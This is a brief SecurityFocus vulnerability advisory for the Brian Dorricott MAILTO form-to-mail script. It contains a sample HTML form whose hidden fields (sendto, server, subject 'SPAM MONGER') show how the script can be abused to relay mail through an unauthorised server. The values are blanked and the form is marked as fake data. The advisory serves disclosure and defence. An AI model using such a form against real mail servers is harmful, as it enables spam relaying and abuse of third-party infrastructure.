Brian Dorricott MAILTO Unauthorized Mail Server Use Vulnerability

The following example has been provided by <>:

<INPUT TYPE="hidden" NAME="sendto">
<INPUT TYPE="hidden" NAME="email" VALUE="">
<INPUT TYPE="hidden" NAME="server" VALUE="">
<INPUT TYPE="hidden" NAME="subject" VALUE="SPAM MONGER">
<INPUT TYPE="hidden" NAME="resulturl" VALUE=>

Name: <INPUT NAME="uname" SIZE=30>
Position: <INPUT NAME="title" SIZE=30>
Company: <INPUT NAME="company" SIZE=30>
E-Mail: <INPUT NAME="email" SIZE=30>
Comments:<TEXTAREA name="comments" ROWS=10 COLS=50 SIZE="10"></TEXTAREA>

Press <INPUT TYPE="submit" VALUE="Submit">
Idiot <INPUT TYPE="HALT !" VALUE="The Above Is A Example Only - The Data Is Fake">


Privacy Statement
Copyright 2010, SecurityFocus